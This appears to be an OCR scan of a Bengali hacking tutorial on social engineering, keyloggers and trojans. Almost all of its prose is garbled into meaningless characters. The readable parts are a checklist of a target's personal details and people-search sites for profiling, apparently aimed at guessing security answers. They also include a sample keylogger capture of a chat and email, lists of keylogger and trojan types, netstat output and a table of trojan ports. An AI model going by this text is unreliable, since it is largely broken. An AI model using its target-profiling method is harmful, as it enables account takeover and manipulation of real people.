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*mHf «IU 4 ^nt%° Titles ft os?c 4 4 <j c*ft 4 ft os?c 4 wt ^tr^h i wr*Rm tw?r 

•iHi^ s^ht^ ftos?c4 <tsft 4<ic<m %»n^? "f^^r ^m^TT^rr^ ctr^i ^r^^rr 
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: ^r c*n?r ^at <it # teft wit ^ i t^.<w 

^nw-e c*trrm w^r 4<r?. ^ni ^jifas. Rto ww\ wl?r w ^rtw 4 <r i 
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svife ^ ■ b : Social Engineering & Manipulation 

oimPr RfR jr^St rr rtrw trr \3i^r rrcr t£ rt^ jrr rtrrvs rcr i jyrr s jiwtcr rIw S-rrrtr rt r%trtr ! 

^R(RR RRflCRt vslI'Hl'CH'fl vR(R(R>fl tv3 ^(RR6Y(Rfl (VR<J4 ^VI4'|5'*5 / t- CRtR ^RTTRR^ ^RR> RRRR W TO"I RRRR 5JTRT RTt RT SlRR <t><f*\\>\ | vslR 

rrr* r*rr RR(Rt(\s> i 'RTR rrr* s rtcr rt i jr siRT ^rirr (Rfw ^rrrr rt rrstrtr jr rrrrr wri Social Engineering jr^ Human 
Manipulations s rrtr^iRT jcrrir RRRRfR arRftR tstEt r^jr i rrr^t jyrr rrst ^rrafR (rrr security t rtr rrttas rtrtrr rt rtr w\ 
rt rtrtr s (\3T ^ttrr *pR r^tt ! r^r Ptcr oRt social engineering 3 human n^anipulation^^ awjr ^trt 

Social Engineering : 


* RWjr 

'■m I 


JI?T Re®* JRR JR*t?T oT- (rvspI^I^ RRRftR* Wf% RTR RRRR JRR3iR RT JRRfRR* RT^jTRR RTIR R*RT RRIv3 RRIvd RT oTRT (RRR RRCRR (RTRTCRTR JR RRTTR 
vsithfl RTvETffRR \3 oJR(.b\3R RIRR RRR (v5Tv§> \3 (RTRR vsRY CRR RRR CRRT I 

(RRR oTTf^T RRvs oTTRTvd RfRSR J oJTRRRR* (RRR RRf%^R\9 vsRT fRRt RT ! ^ITRtR RuvsbR R*RIR \3 RT I fRRF oTTf^T oTTRTR RR(RR R^fbCR* RR J RIR fRR 
(R fs (RiR^ Rvcvsbr rt r*rtr\3 i social engineering v3t vsRi sjtrt crr rrrr t jrr^t R¥f% i 

Human Manipulation : 

(R RR^tW (## R^hf% C\3 JR 7 RT JRRlW RT^JRR oTTFRRR^ JR° WrfRR RTTRRTR 3 ^RRf% (¥ fRR^HW R*RT RR v!>T(R* RRvs Human 
Manipulation rtr I 

(RRR oTffR" RRvs RRTvd FTf*R RT (R ^JlfR (RRR JRTRR (a R[f% fRRF ^JTRIr (RtRRRvs ^RKR (RR RRR fRlvD RTRTRR (R ^TflR (RRRTR RTf% I J&ft Human 
Manipulation. 

^ social engineering 3 human manipulation r^rtas s ottrrtr hirt^r rrs^jjrt orf%R vsrti j^irt ^nfR ^ ^ttrrir IrR i 

(rtrrtrt rt^ (rrr security questionnaires j j^trtr (o^r (RTR^ hr r^rt s rkr^ ! ^r crr (Rt sk?to% vsrt yrr f% f% 


1. Full name:
2. Nickname:
3. Father's name:
4. Mother's name:
5. Date of birth:
6. Place of birth:
7. Primary e-mail:
8. Secondary e-mails:
9. IP address:
10. Country:
11. Division:
12. District:
13. Phone number:
14. Cell/mobile phone number:
15. Best friends:
16. Pet name:

| J&t (RR RT I ^TfR\3 ^RRR vsRT t RRRRR RT(R I (R^JXRT \3 HlRT^iR Rvs J fRR? J (RTR RRR fR(v3 RT(RR I 

| JRR RRR%RT^t RfR ^^TKRt RIR RffR Jt RRR%RT^t JR (RRR ^tRT (Rt I W'iKRT S’RRR WVKflT RWfe (\s R^RT RTR RR^f &[l vslR ^IfKRb (R(& \3 
otirtr Rnfe'Rvs oj'fevspvsi (RTR^ oTtfR rr (RiR^ RRR%St Q: St r^1%r r^rt rrr jrkr ^\str T?pt RiR (Rt social engineering v3 human 

| manipulation r^rtr ^rt ottotr rtrras s ^ t reflex action 3 r^ttr fari - r^rt rrtr r^t I vsmRt ^rraRTR rr^t ^rtr r^trrt s 


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| i / /W ^3T (RR RRT / (RRTR RIR RTRFTR (R RRT$ $ JTO fR oTTRIr \3 Rlfllbvs \3 ^|V3|R<I> R(fKR*T \3 

| i RrafR rtr jt a^fe yn ftrtff ftr tfrrr w - rrr^r c^r Pr rtcr i 

I RT3T RM oTfR olM RIR afvDRFFR R^lfl RflR^ RTRIR vdTCR R(RfRR RTRRTR R^JR vs>^ RRR [ 

| R(R Fife R«1 ! ] JFF R(R afvDR^F RT 5 RTR RRR^fftRR , WR ^|bfl \3 RRTR WT Rl°^l RCR RRCR 

| _ ~ 

jr° vs*r rtr oft rrr*^ r?“ 


RIrIrRd (F RRT RRFF v3 FTtMT RM 
w Sr homework ^ ^ i ^ ^ rrr 
vOJ<l*H? 3fvDR(.R>fl RRR ■ ^fW'i (R fRTRR ST 
I JR RfCRt RRpT RORR &T RTORR ^R RTORR 


I $/ Sfw^T viV^iS)/.^ 6 /?" iRTfRR ST RR , ^rf%RTR ^TRRT ^RjfR RTTR5TR ^ ftsffR RR alvD^R R(?lR(\s>fl I f&W RR (R^R oTRpT RTRTR RTR RR 

1 RR RTRR I RTRT — RT , FT^ (RR RRTl $ (RR RT (RR RRR ^JTRRTOR RTRFF RRR ^ 

I 

1 

I 15/W (3yR (Plfw J7W J7R^T (F7R ' ^R ^sjfl 'RTRfR' (RRRR J JRST (RCRR RTCR RvgR RvgR R^W RTf%(RlRR JR° ^JTRRTORR ^U®ifl FN \3 ^TRR 
p JRR RR ST RvF JRfRR (RTRIG CRT R^RR RFR ^RFF I ^JTRRTOR RR RT^ ! fR$F (RR FTOR Raf% ^iRR RTRFTR R RSRT I ^JTRRTR RRT RR 
| ^T^R (RR JRST RRT RTT ” ^R .RF5f (FT vs)|«i$ TOT RRR R^jTRR RTOR .RRKR RTR\3 RT (— l\sR RpT tfiiPi vb'iiPi RR ^ tfilPl 


I JR RR ^RTRRTR RR fRR RRT RTRTR RT ''-ic^RT RRR RT RRR RR \ 3 ^ C*KR? RRR i 

1 5 / a/R/^/S W R^R /RR RRR JR RRR RTTRRR RRRR RT ! RRR v 3 affl'Rfe ^JR RTTRRR f^R R^R I JRRRt HRl^R ^TR RTRRR reflex 

| action jr i r^t rtrt IrrS rt#r RrafR Rfa jrrr w (vf vftr rkr crtr Mtotr rttrtr RrfR^ftr rrr rr rr 1 r\ $ rtrrtr 

I afe^C «1 FFT RTCR ^ 

I 

(tl fiiflRfJ *1&fib ^ 7 RR^R R^R / (RTR fR^FF^ FIFT^FT RRTRR RT ! JFF RRT^ fes tRaffe ^TR ! (FST R^RfRCR FR a^ 1 % RRRRR RRFF ! JR“ 
| aTRFT RRT RT vdRT ^fRTR (RR RRTR (FtT R?JR ! 


r j yrT f%R PlK^ RFJR (RTR vsRT RX2IR RRTR fRR a^hfe I JRRR3 RRT aarf% CF \3 RTafR RTRR RRR RCRR \31RRR]¥S (R(R \3 RaTsTTpfvF RTRR 

vFar caiR ftff arRR i jrrr ^aRrfR rtrrSt v3cr^ri5S jr rtR fRTF m 

http://www.411.com/
http://www.ask.com/
http://www.bebo.com/
http://www.facebook.com/
http://www.flickr.com/
http://www.ip-adress.com/ipaddresstolocation/
http://www.myspace.com/
http://www.myyearbook.com/
http://www.searchenginez.com/findpeople.html
http://www.skipease.com/
http://www.sonico.com/
http://www.spock.com/
http://www.twitter.com/
http://www.usatrace.com/

?)|R»\ f¥p pKilW fl*H “Pfllfl *t,(e “Pfllfl *'!«() «T?T

http://www.whitepages.com
http://www.whois.com/
http://www.whois.net/
http://www.wink.com/
http://www.youtube.com
http://www.zabasearch.com/
http://www.zooimnfo.com

srmiw srmsr http://www.google.com: 

* 3irw wFrft «th Social Engineering a Human manipulation i 


Pl^T pKilW S*H “Pfllfl «i«ll *t,(e <Pfl IS «T?T 
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* : #rfsR ? afrr R>oiw wr ^ ? 

Mte ' P raro ojHfii f¥ro fN%° 3 to ^R#t?r ^ro ^(b®ii(b i o^®i TOSt to toto totPito ## ^ ftrPT° (tooito totovs to tottoto (b3®iTO totot ai(®iTO 

vaTTOl CETfCTO (bS°i TOTTO I 3TO]^ TOtt TOTO TO# PiW CTO' -m<M I fTO$F ft## <l>fl|fl TOTC 3 TO# TOTTOTOTO 3 TOTTTOTO cjTTO3TO vTOTO TO 7 ! &[ tf tfifjjfi TO ? 
3^Tv3 TOTfRTO STRICT 3(TO<ITO TO TOT TO TO ! 


TOTOTO TO£ TO TOTO TOPJTO (tfiTO (TOl ffapR fTO ? 3# (f \aiTO TOTTO <Kfl ? 3TO TOa (TO 7 TOTOT TOftS? 


grot GSiCTO Rt ffaffix fTO ? 


Keyloggin to Keystroke Logging wr 3 to#t to#v3totto tototo 3to#t wt3?mTO tos froroR TOfroTO cto£t 3to#t TOf i TO#trro 3<r Hi# It ft cro# 

3TO (#TTO ^Plbfl / TOCTO C?Ito 3 TOCTO \3^ TOpPSblfl 3TO 3TO ojvspKvs I fN%° TOt^TOrTTOTa TOTOTO TO^3TOTTTOTa (TOCTOTCTO #TOCTO TOTO 

TOT I 3TOtT TOTf#a#fl'R' 3 #TTO (TO dlW 3TO TOTTOCTOfl feTO W TOCTO I 

s^vva toctot ss HCo^fi Perry Kivolowitz < ##f#TO3%TO! ftroiTTO ft^n^r tow 1 ^oso tow to# ^pift tot ^jPrff (afNPix to 3 tot 
tojto srto G:s%voo ( approx.) I 

ft *TpR 3TO TOT opfl^ Cfl^t TOT ft e3?TTO ^JTTO TOTOTOTa CA 3 3TOt?T ,TXT W«1 ftCTO' (TO TOT I oTT^gpR 7 ftTOTTTO ^ITO - 3^ TO TO 

3<! TOW ^fTO C^3TO (TOa TOCTO I TO^fTOTO TOf ftTOITTO fei Prefix 3<! TOfT (TO fjlfc TO fTO (TOTOg 3tT aTPTTOTO ftCTO# 3<! TO (T#TO $ 

(TO 7 # TO(<I (SfTSvg TOT# TO# 3tT TOTTOITTO TOTTO3TO# 3TO ^TTOTTO (TOTTOT aTO \3 (TO 7 # ^TOTO Wbl 5 TO oTTTOTO 'TOT oTTOTOT^ ^Tff CTTO IhW 
! TO#TO f#fTOFT TO TOTOTOM ftTOT TOTOR TO TOT^ TO# TO C^fet TO# 3^ Svb f#f#t TOTTO#t TOTO v3 t#f#t 3^ fTO TOTO tT TO3^ TOTO 
TOT I 3TOTO\3 ^TO TOTOTO TOC^f fNTO TOT ^?T I TOCTO TOTf#TO3 ^TTO#TO , TOCTO TOTOSRT# , TOTO 3^Tf% $ #MTO TOT ^?T I (TOTOTO5t ^ooQ: (^TO 7 
fNfTO R 7 TO3CTO3T TOTO 2 ! ft(TO TOT ^T oM#rf#TO TOTOTOs 3 I 3^ TOT $^)o,ooo TO^®T oTTOT ^ TOCTO from TOTOTO3 (Tfv3?TO 

oTI^®T olTO ! 

3TO% fNPr^ TO TOa TO^RW TO^T TOT vsTO TOTO TO CTO 7 fTOTfvs SumitOHlO Mitsui 3<! ^TT tT I 3CTO TOTO ^TfTO (TO 7 ^ooQ: 

TOTO fTO 7 ^TTlTO f#fTOFT ^T C^lt 3^tT Svs R 7 ^ 3^ fpTCTO fTO 8^vs prf%TO fHt*T ^Tf#^ gf% TOTO (5#T TO I 3CTOTO (TO ^VCvsfl 3fgT 
OsTt vgcro toto ^ fNro 3^- fwPro Yeron Bolondi ^jfro 3<r ^tto tot cto to ! 

3^TTO\3 alTOR 7 ~^5 ~^5 RTTv^ 7 CSTOf# Ca \3 fN1%“ <K?1 ^ITOR 7 tTOT ^Tf#C?T TOvS^TO ^(fl ^(fl 3hl^fl«i oTITO ! 

aj|>K«i5 <li(#>3\3 fTOTTOTO TOTO fllpT® ^ ^ ^5 3<^b| ^iff | \3]^ aJlR TOTO T TRT TOTO jTOTOiTOTO (TO ftTOf^T® TOCTO TOfSTO TOT^ I 
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sfy 3^5 T ^&'3?nw I 


LOG.TXT - Notepad
File Edit Format View Help

chat.yahoo.com [Ent]
mike93a [Tab] mike [Ent]
hi david [Ent]
let's skip school tomorrow, he? [Ent]
Nobody should find out! [Ent]
what do u mean? [Ent]
of course! [Ent]
check out this link: [Ent]
www.forbiddenstuff.com/threadl2961.html [Ent]
send it to you by email [Ent]
[ctl]n [Alt] [Tab] [Ent]
mail.yahoo.com [Ent]
mike93a@yahoo.com [Tab] mike [Ent]
david_ros@gmail.com [Tab] fun stuff [Ent]
here's the link, make sure nobody sees it [Ent]
[ctl]v [Ent] [Alt] [Tab]


sfy s\w&\ *rsr fan# 


M (5^ WF5\ 


w&\3 :i Tn^' Rvsfi 


Hypervisor-based : ^ gf Malware Hypervisor ^ i Svr^fH 

Blue Pill 


tnfr° f*r^jr 
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1 API-based: Application programming interface <it JRtspr API Pr©?r #T 5 im ?pt mt <it fssn^r ^?n ^ (siw sresr i ap 4 iTc<r 4 

2 ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ r JA „ rT ^ A g ^ § 
| 3 W VblfK^>i feTOT' j^R?^T 3 ^ ^Ifllbvs 3?T I f^fP^T 3 W ^TT^^TP^- s \37 573 TOT 5 T]?T I f%$F Sns T^T <Pflp1 [ 40 + WPM ] 337 ^TpR> PJjT^ | 

I _ 4 

tror 3 pr i | 

i \ 

! | 

| Kernel-based: sj?ra?r #rsn?r i em .a?n ^t?r i .a^pt wi&rqfS FUD / Fully Un-Detectable I a^pT mr $ 

| pnnr <p[?«i w>*h a?pf <3> 5 W3> 5 <p[?«h i a^ 5r&'3'?Trr3' s>i$ei?i Roiw f^tPr a^ 5t?r ^"src i 

I I 

I I 

| Form grabbing based: v 3 pr 37S6V13 3 wr 333^7 ^ 3537 ^ Sr HTTPS / HTTP ^pqr^r +tx 3 ?jw onpfe 3 ^ptt 33 3^73 . 

I (wt 3 srapra- ffew 

I I 

I I 

1 1 

I Packet analyzers: HTTP POST wwwi cf tot 3^73 3243733 3373 i 


5T&33TCI3 fe\33 ^)+>1l3 


I Firmware-based : BIOS pjpf 33 Firmware ftr 373 to 333 337 <£i«fe 33 33 $3^ 33 333 
| Keyboard hardware : fefe 3 #l 73 fe 33 cwhi W 37 cvs 3 ^ 373 [ S3733 3 f 33 3 \s ] <£17374 33 (3733737 33 333 33r 1 

I 

I 

| Wireless keyboard sniffers : wireless % 3 fe ( 373 ^ 33 iw 3 +i^tptt 03733731 33 333 337 i 

| 

p Keyboard overlays : 3 fr[ 31233379 (337 373 ATM (3P13 ^ttvs i W 73 37 *p wit 33^ 24^^33 o 7 f 33 ^t fefw w ATM ( 3 pT 3 33 #t- 

0 

I w 3^ 3^ pt^w c 5 ^ PIN ^ 1 

I 

1 

| Acoustic keyloggers : s^vb w CIA 32^7^ #hr^ ^rpr 1 3^ a% S7 #t 3^ &aw 3^7 few Acoustic 

1 Notation ppr 1 ^ pr tott^ orfe \3 tot fepr wr fepR^r ^cfi tot <pfii ^ 1 

1 

| Electromagnetic emissions : ^00^ w ^7 fewr%7 3 *rapr<T #7^ onf^w ^7^7 1 ^o ^ ^ ^ c 2 ^ 3fr ^r ^ ! 


I ffrftriw 3W 3TTPJ- 3^rf^fe 3nw>3 fe^ v wr m few 

I 

| Clipboard logging : Clipboard 3 wiwi fe\ ^7 

I 

I 

p Screen logging : Screenshots 3 w wipt #fe^r ^7 


f+vaic^ ^In^ifi s jc°ii \3ifi <pfii vstDr winSi+r ? 


| S I FTP TO 3 T 7 T 3 W ^TT W 

I 

1 ^l^fe^Tfevs (TOT ^pfer oTI^fe (\3 pfer 

I 

| vs> 1 v3?nM«T57 3 ^ ^ 72 ^ 

P 

P 

I 81 (fl'CHlk ^l'C^]'H 3W W | 


fe\aic<i OTaW ^p77 ^737 ^C\9 ^iicai ? 

^Ylfe° PiC^C^f 5 ~3W\ ^fllfl oTpfW ^fe ^fllfl ^ry °pr 
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SI (^1=T S\^ J^TS' ^fll (^T°T ■^|^ c 1 \3n°T <K£l 

*i P 2 P 

vs I C 3 ! - ^ Rtfi 1^°i ^fll S\<p bl \3l?^ CTO 3 J^f%\3 aiS^lfl PiC^J 3lS>i ®TT ^fll V3 3 I=T 

8 I ^°ii C^T®T 35TlWfl S\^ 

Q: I C^T®T ^flC°ifl 3 T°l 5 rK‘ 5 lW S \^ 

vb I RRj / (vbRRb C 3 !^" 


teE simfir arara ^e^iwh' ffaffa .ra ? 


b I \5TC*TT ^ilFbOl^flR' S \^ ^TT^y^T 


^ I PlCbfl ^R ^bl OT ^55 I J^bl ^blt SIFT S\^ C3T3W 3^ R°b oT[W oHi ST &R£ ^lilWfilfl Sffi I ^5T ($3 (^T=T (3T3W I?T ^Rfb\3 

«H 3i^K C^bl SlffpT 'Sl^C c i'3 <K£M 1% ! ill'll ( c t 3 JI\9 (^(*1$ <341 W«1 ^T 5 Tf% oji^kj | OrSt °TT <Kfl ^TTC 3 ^ aR^lfl 1 J^ <Kfl R®1 


[Screenshot: System Configuration, Startup tab. Startup items shown: Xvid, Adobe Acrobat, GrooveMonit..., AcroTray, ClickPotato, Data Manager, Adobe Acro...]

[Screenshot: Windows Task Manager, Processes tab. Processes shown: acrotray.exe, chrome.exe *32, ClickPotatoUt..., csrss.exe, datamngrUI.e..., dwm.exe, explorer.exe, ONLINENT.EXE, questscan.exe, SCANMSG.EXE, taskhost.exe. Processes: 47; CPU Usage: 0%; Physical Memory: 51%]


fo'SlM 4lbt<H PIPF ? 


| S I Oil'll '^UlfboiSfll'l — 14H Pl4g (?T^ 


| } i Anti-spyware - *« s?r ^ w 4 t?r | 

I I 

I I 

I »i Network monitors - w cm OTaw Prcsr <?it 4 a 4 iH 4 i 5 t» *rr?r ««pr (4 Hw«t 4 4 t?r Network monitors I 

1 _ 1 

p 8 1 Automatic form filler programs - nfr ^iW 4 B[ snSwra s?r skBtctU^ spm remember my password j?r p 

I I 

1 1 

I a i One-time passwords (OTP) - 5P&a?msT ^rr tw #1 ^T5tt n?r af# (pr?r W a 6 

1 I 

| vbi On-screen keyboards : $$«>t>si ,a?r 4igsy?i fsiPw i ^ ^ t c?P4 ^nr ow aBm ft c#P4C4^ <rat\s araw | 

1 © | 

i 

1 I 

| s i Keystroke interference software - 3 ? gf encrypt ^ ra" i ^5 ^ <M( 6 Vsi fet^r $ 


| oitt[\ 3\3 >at R*t i 


^|Pk pPJJT pK^(<b ~3W\ ^[v3 <i>«qi«q 3RT 
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«diPi4 snfo ^ «: iSwr f% ? w ? R>®iw ? 


^iPgT OTT («lt ff 


mu mu maim 



(S|vSV|<H amif S?(f(a(vbai <K .°1 


A Trojan horse, or Trojan, is a standalone malicious program that does not attempt to infect other computers in a completely automatic manner without help from outside forces like other programs and human intervention.

a Psfl PT aa (HTSTTa <q|t(.flfl CmTa amm am Caaa WI C3T3W 3a^ ^l^fl a^Cm am aa°fea sTCa oiay mP*lSblfl ai fap6a 

cm mara cstr mxa ar sicaa cm dm ar c£ma sa" m i 

wi sht os 3mt? araa v3 faaracaray [ trusted ] carsna 3am3a xjfmca armr wfte v3 ^fsmiaa carsna dm I mmg , 

sit aa atstafa , mrfaarff , mpfa^fs , ayrft aatmit aa fam& wrar (mm ara I mar aaca aca arta sraixafi^ fapfia aa registry 

at Wf aa C3T3W $ Wfe ma pfpg^T 3?T mm w sea i 


(§T^T aa mifRR : 


ftm faa sj<^i 51 ftm ar vsicnfi Pm <qi[t51 cm ^icia Pi>facama cssa sia cat mfmjxarcm 3?a ai^lpia vtaara cmi axa ^ m'>3? I 

3 Pm ^pn cam cam caw 3?a aa ^acsay oma aa cssa (am ^anmaa mxa 3?a aaa mca cm i srai®r pjmt *^is aaaxaa carsTpr m dm aw i 
| cm aa i 3m mrnra ar siacaca Mr. James 3 axa aim 3a ya ^fta mrm wm my ! 




(SWK ,3?r ^fg'4\sl 4T RjW&HIfl a?* W (SlTO 4?(T\3 TO^TT (4K W 0 # ! ! 

malware , spyware OTsrpr ^r 5 ?r 4?rr , 3 3 5 ito5 stow , aiaw ^ $ <rat« to i 


(Swh *fw«f : 


jBt 41% , f®f%& , m? , adware , 




® Remote Access Trojans: 3^mr fe4f5a 3a fap^a 3a srr^Pm ar aaa faia fam aim i 3a^r msra rnyfamara 3a 
| ararca fea^fEa 3a fafa aa aacaa mjma aar^a ^mra 3a faPr mm i fata^r mara area area 3ia 3a mfcaP fap&a [ symra 3a 
farp^a ] 3a area 3mf?r fapffe caift 3a amca faaraa a^pna "^Taa mca i 3a aa ^aoaa? ta^^a cam ar ^mr mar ara f%mf?a 3a jap^a 3 i m^ta 
sia (^mra 3 aamai 

0 Data Sending Trojans: 3mPr ar aampsia 3a aaca femfGa 3a tap^a ft - aa , ara^a^ , ffm mrcaP fap^a 3 fa^ 

| aca i 

0 Destructive Trojans : ^ Srviy 3 amaa ®rmr araara aar ^ca am i (3m) m^ar^ Sct ■ tap^a mra , srarcafi^ Pcn^a m 

| mar^ mar ar ^ar^ar irm rni^a fef% mar i (^ ) fafaaia Sr^*r\- ■ orraara fafa ona maa 3a cv^a aa mm a^ arar ^ orraaia 

| fapga 3a mrara^aT^ m mrf^oitara i orraaia fafa m fama arara 3a as arfaia tarn maa ar 3 aacaa ®roa am i 3&r 3aa sica orsna 

mar ca 3 srraara tap^a 3 3 pt aaf% ama ^rraara^ arcaa mrara \3ara ar mTf^sitara 3a S'aa 3^prra ta^rtaf? m ^“fam ar ^jmjfa 

1 feamicaa mca i aas ^raara mrca aafm^ orrais \3 fSmirm ama fm^ - (f ^ fSm cal - 

0DDos Attack Trojans: 3m&raisra 3a area a^^ aa fap&a [ ana ca&v3arf ] ar fap^acm afaia prara ^ay 3a cmra ^aar v3 at 

!, Saa \3 at , afsaa a at 1 3ar oraaima ! aaia arsia 3 a a 3a area aqm aa^xar fapSa ma cm orrmaa mca ar tamre^ 

I 

mca mca 3a° 3^car m ^ymait mca area 1 3a aa mxa aa^car fap^a 3 3a° fap^a ^car am aisia 3 3marca ^r^afs tarp^a mar^ tarn 
| aim 1 fap^a 3a mpfmft aasia aitca aaat mam 3a a^mr Ra area saa 3 aisra v3 3aarca a^^ aa^jear fap^a 3marca myra maxa 3a^ 


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0 Proxy Trojans : w cr niter ctor rrP -ate teroi tor Rp rtrtr Pter cro ter otitor rrr i r srt ;rtrtr PiPt aR 

I teFR oittoto (TOa scr i ter w 4 tou<6 tors crf TOte Sr cm TOfR i tte <r rt otitouf tesR 3 fw tor i a tor tero 

P 

| r Sr rttrtor tort to*r cte oritctefff , te Pr , totto r a omv^ i ^ a Sr ^ rP a^fc^r cteR ^iiw tort sr i aSr tort ter rto 

I aTOTR (Ro Piter TOmfR TOTR ^RTRIR ^(flb^l PlvD TORR aR° C>KR>(.-9 RTTOpT RTITO 3te> TORTR\3 (TOo Piter aR ^(flb^l TOCR , oTRR Sr to ! 

I 

0 Security Software Disabler Trojan : ateTORt tesR i Piter cro otttor tout acror to to?r Piter aR fteP to aRR tor 

| P^ilfllb RTOfTOTORTR a^ TOTOp\3TO>TR ^JJTO (TO fP^TOTCTOT TOCfl TORRvSt ^RITOTOiRR >3i«ii oTFT*f TOfRCRTO ta(fl TOCfl Cn^RT I a UR (TO Cflft> Q?TO3iTR \3 RTR TOTO 


fTOTTOlR ^TOflRR TOTTOpT TOTaTOY ten [ TORTfte>RR 


(Srir aR torctoto <ivb totoPftorr ^Rs) ^ aSr er ctotr rrtot cat cto?\ 3RR> RTTR^rte aR tour ate PPfP unt? aR tottor Ptctortr (TOP rt 

p 

| TOTTOTR aR Piter a RTPt Pte TOCR I TORTOTOTO RTTfPvRtRTTO oT^RT oJiiPb te \3YTRTR ,orR? TOR \3TORTR a^JCTO TOTOCR ^R TOTO^it oTPTpC WCs 
| TORCRR TOTTOpt (teR RTTOW fTOTO I ^ \3lt TO RT^TpTR^T ffPJo v3 TORUs TOTTORR I \sCR a^RT TOR 3 Rite <jTOCv3 TOTRCRR TOPTpT oTTTOW fTOTO I 
| TRR Rifted TOCR RlPr RRR RTRTRT pRT PlRit (teiTR ft ^Ri (R RTR (te te? 1 ^R RTRTO W t (teR ^CTO FUD / Fully Un- 

I 

I Detectable r i r 2 /^ ^ rrtotoy RirteRtRR \3 aR Rfw torr^ rrs tor to ! Prt Ptotr rr rrcr \tor tofP rtPt 

I RTRTRR R aR RRR ^ 


^) STORt RUN CTO^ RTO^ TOTO& RI CMD v31R R^R PlbR ffeR TOs RTR 


[Screenshot: Windows Run dialog. "Type the name of a program, folder, document, or Internet resource, and Windows will open it for you."]


run ^ 1 enidi T^TuR -Xi c i? 1 -1 


rttto' tors v3iR w\ netstat -a Pur ate Pro iau» rtr rtrtr Piter aR rr rr^rt ctoS wrr , ctrtot , rr toot 3 aR 
OTRTO TORpfe ate vd|Pi4 I TOT*f=T RRIR CMD I 


TO%° P^T PlIRilTO R5^T ^R[R RT RITOR RRTR RT R 
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| vs) aw£ laww netstat -a to to am a to aww ^wrawrw ftow aw wpr cart cw awto wwrcw CMD tow tow | 

| WVD wtw 


C:\Windows\System32\cmd.exe

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Pirate Lord>netstat -a

Active Connections

  Proto  Local Address          Foreign Address             State
  TCP    0.0.0.0:135            Black_Pearl:0               LISTENING
  TCP    (3.0.H.I3: c l £ i?)   Black_Pearl:0               LISTENING
  TCP    0.0.0.0:2869           Black_Pearl:0               LISTENING
  TCP    0.0.0.0:49152          Black_Pearl:0               LISTENING
  TCP    0.0.0.0:49153          Black_Pearl:0               LISTENING
  TCP    0.0.0.0:49154          Black_Pearl:0               LISTENING
  TCP    0.0.0.0:49155          Black_Pearl:0               LISTENING
  TCP    0.0.0.0:49156          Black_Pearl:0               LISTENING
  TCP    127.0.0.1:50693        Black_Pearl:50694           ESTABLISHED
  TCP    127.0.0.1:50694        Black_Pearl:50693           ESTABLISHED
  TCP    127.0.0.1:52465        Black_Pearl:52466           ESTABLISHED
  TCP    127.0.0.1:52466        Black_Pearl:52465           ESTABLISHED
  TCP    127.0.0.1:52474        Black_Pearl:52475           ESTABLISHED
  TCP    127.0.0.1:52475        Black_Pearl:52474           ESTABLISHED
  TCP    127.0.0.1:53763        Black_Pearl:53764           ESTABLISHED
  TCP    127.0.0.1:53764        Black_Pearl:53763           ESTABLISHED
  TCP    127.0.0.1:53766        Black_Pearl:53769           ESTABLISHED
  TCP    127.0.0.1:53767        Black_Pearl:53768           ESTABLISHED
  TCP    127.0.0.1:53768        Black_Pearl:53767           ESTABLISHED
  TCP    127.0.0.1:53769        Black_Pearl:53766           ESTABLISHED
  TCP    192.168.52.174:139     Black_Pearl:0               LISTENING
  TCP    192.168.52.174:51139   sin01s05-in-f21:https       CLOSE_WAIT
  TCP    192.168.52.174:52103   magenta:http                ESTABLISHED
  TCP    192.168.52.174:52467   cs216p2:5050                ESTABLISHED
  TCP    192.168.52.174:52476   sipll7:5050                 ESTABLISHED
  TCP    192.168.52.174:52494   magenta:http                ESTABLISHED
  TCP    192.168.52.174:52522   magenta:http                ESTABLISHED
  TCP    192.168.52.174:53593   chanproxy-13-01-snc7:https  ESTABLISHED
  TCP    192.168.52.174:53770   relayl:https                ESTABLISHED
  TCP    192.168.52.174:53771   relayl:https                ESTABLISHED
  TCP    192.168.52.174:53814   Meramex46x86:icslap         TIME_WAIT
  TCP    192.168.52.174:53815   Admin-PC:icslap             TIME_WAIT
  TCP    192.168.52.174:53819   sin01s04-in-f15:https       TIME_WAIT
  TCP    192.168.52.174:53820   sin01s05-in-f18:https       TIME_WAIT
  TCP    192.168.52.174:53821   sin01s05-in-f18:https       TIME_WAIT
  TCP    192.168.52.174:53823   sin01s05-in-f18:http        ESTABLISHED
  TCP    192.168.52.174:53824   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53825   sitecheck2:http             TIME_WAIT
  TCP    192.168.52.174:53826   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53828   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53829   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53830   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53831   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53832   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53833   *:http                      ESTABLISHED
  TCP    192.168.52.174:53834   tm:http                     ESTABLISHED
  TCP    192.168.52.174:53839   sin01s04-in-f15:https       ESTABLISHED
  TCP    192.168.52.174:53840   sin01s04-in-f15:https       ESTABLISHED
  TCP    192.168.52.174:53842   8.19.18.191:http            ESTABLISHED




| 8) Local Address aw to spf at% arm vsrw ’:’ a^ ftow aw or wx*irr www v3frft sew ^ wiwwaw aw cwpm | 

cafl? I tow tto - wy awt?r tww? ef\3?n ^ikw i cwwkw alfilbvs ww (St^tw yrr <wrw cwrw cat& wrstw wiw vstw towwr wwr sots i v3wt®t | 
I otf wrawrw CMD otf ara to aw wrcw twto cw 1 to csott cwrw cart tor ots vsrser tow tow wvs wiw wfwrw wwiw ato a

Port          Trojan
1 (UDP)       Sockets des Troie
2             Death
20            Senna Spy FTP server
21            Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, Invisible FTP, Juggernaut 42, Larva, Motlv FTP, Net Administrator, Ramen, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash
22            Shaft
23            Fire HacKer, Tiny Telnet Server - TTS, Truva Atl
25            Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
30            Agent 40421
31            Agent 31, Hackers Paradise, Masters Paradise
41            Deep Throat, Foreplay
48            DRAT
50            DRAT
58            DM Setup
59            DM Setup
79            CDK, Firehotcker
